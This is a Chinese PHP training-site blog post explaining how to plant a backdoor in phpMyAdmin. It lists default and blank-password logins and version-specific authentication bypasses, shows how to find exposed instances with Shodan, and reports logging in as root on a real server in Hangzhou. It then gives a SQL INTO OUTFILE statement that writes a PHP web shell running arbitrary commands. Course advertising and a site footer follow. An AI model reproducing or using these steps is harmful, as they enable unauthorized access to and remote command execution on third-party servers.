扣丁学堂PHP培训之phpMyAdmin通过密码漏洞留后门文件

2018-11-28 14:26:38 423浏览

今天扣丁学堂PHP培训老师给大家分享一篇关于phpMyAdmin通过密码漏洞留后门文件的详细介绍,希望对同学们有所帮助,请同学们谨慎留后门哦!

默认phpMyAdmin:用户名root密码root或空登陆。

版本2.11.3~2.11.4:用户名'localhost'@'@"登陆,无需密码。

版本2.11.9.2:用户名root登陆,无需密码。

经测试,第二个漏洞在phpMyAdmin3.5.1版本也是可行的。原理从略。

下面让我们简单的上网看看能不能找到一些存在这样漏洞的登陆页面。

祭出著名的漏洞搜索引擎Shodan并搜索phpMyAdmin。


先看看有没有不需要密码登陆的,逐一尝试没有后寻找名字中包含的版本号。这里我找到一个国内的(浙江省·杭州市)。



地址已手动打码。
http://121.***.*.219:80/


登陆成功(root权限)。



接下来你可以写一个outfile到对方主机的网络目录下。俗称“留后门”。

SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后门文件的绝对路径"

点击运行,不出意外便在对方主机留下了一个名为runme.php的后门文件。

以上就是扣丁学堂PHP培训之phpMyAdmin通过密码漏洞留后门文件的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,扣丁学堂有专业老师制定的PHP学习路线图辅助学员学习,此外还有与时俱进的PHP课程体系和PHP视频直播课供大家学习,想要学好PHP开发技术的小伙伴快快行动吧。扣丁学堂PHP技术交流群:374332265。



【关注微信公众号获取更多学习资料】

 

查看更多关于“php培训资讯”的相关文章>>


标签: PHP培训 PHP视频教程 PHP在线视频 PHP学习视频

热门专区

暂无热门资讯

课程推荐

微信
微博
15311698296

全国免费咨询热线

邮箱:codingke@1000phone.com

官方群:148715490

北京千锋互联科技有限公司版权所有   北京市海淀区宝盛北里西区28号中关村智诚科创大厦4层
京ICP备12003911号-6   Copyright © 2013 - 2019

京公网安备 11010802030908号